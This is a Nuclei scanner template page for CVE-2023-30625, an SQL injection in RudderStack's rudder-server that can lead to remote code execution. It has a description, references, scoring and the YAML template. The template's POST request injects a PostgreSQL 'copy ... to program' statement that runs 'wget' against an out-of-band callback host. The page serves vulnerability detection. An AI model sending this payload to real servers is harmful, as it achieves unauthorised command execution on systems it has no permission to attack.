Rudder Server < 1.3.0-rc.1 - SQL Injection
ID: CVE-2023-30625
Severity: high
Author: gy741
Tags: cve,cve2023,packetstorm,rudder,rudderstack,sqli
Description
Section titled “Description”Rudder-server is part of RudderStack, an open source Customer Data Platform (CDP). Versions of rudder-server prior to 1.3.0-rc.1 are vulnerable to SQL injection. This issue may lead to Remote Code Execution (RCE) due to the rudder role in PostgresSQL having superuser permissions by default. Version 1.3.0-rc.1 contains patches for this issue.
YAML Source
Section titled “YAML Source”id: CVE-2023-30625
info: name: Rudder Server < 1.3.0-rc.1 - SQL Injection author: gy741 severity: high description: | Rudder-server is part of RudderStack, an open source Customer Data Platform (CDP). Versions of rudder-server prior to 1.3.0-rc.1 are vulnerable to SQL injection. This issue may lead to Remote Code Execution (RCE) due to the `rudder` role in PostgresSQL having superuser permissions by default. Version 1.3.0-rc.1 contains patches for this issue. reference: - https://securitylab.github.com/advisories/GHSL-2022-097_rudder-server/ - https://nvd.nist.gov/vuln/detail/CVE-2023-30625 - http://packetstormsecurity.com/files/173837/Rudder-Server-SQL-Injection-Remote-Code-Execution.html - https://github.com/rudderlabs/rudder-server/commit/0d061ff2d8c16845179d215bf8012afceba12a30 - https://github.com/rudderlabs/rudder-server/commit/2f956b7eb3d5eb2de3e79d7df2c87405af25071e classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H cvss-score: 8.8 cve-id: CVE-2023-30625 cwe-id: CWE-89 epss-score: 0.94887 epss-percentile: 0.99286 cpe: cpe:2.3:a:rudderstack:rudder-server:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: rudderstack product: rudder-server tags: cve,cve2023,packetstorm,rudder,rudderstack,sqlivariables: cmd: "wget {{interactsh-url}}"
http: - raw: - | POST /v1/warehouse/pending-events HTTP/1.1 Host: {{Hostname}}
{"source_id": "test'; copy (SELECT '') to program '{{cmd}}'-- - "}
matchers-condition: and matchers: - type: word part: body words: - "error getting pending"
- type: word part: interactsh_protocol words: - "dns"
- type: status status: - 500# digest: 4b0a004830460221008ed82831c35c7cf055873415132a9db9e51a73872c29e2e9c7fcd21cb38e2fe0022100a1bba7490a5e1774773cbf1cffb00e7dc71ff1c82ba56575c12c9f675290dd2f:922c64590222798bb761d5b6d8e72950Guide to check the vulnerabilities
Section titled “Guide to check the vulnerabilities”This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.
$ nuclei -u "URL" -t "http/cves/2023/CVE-2023-30625.yaml"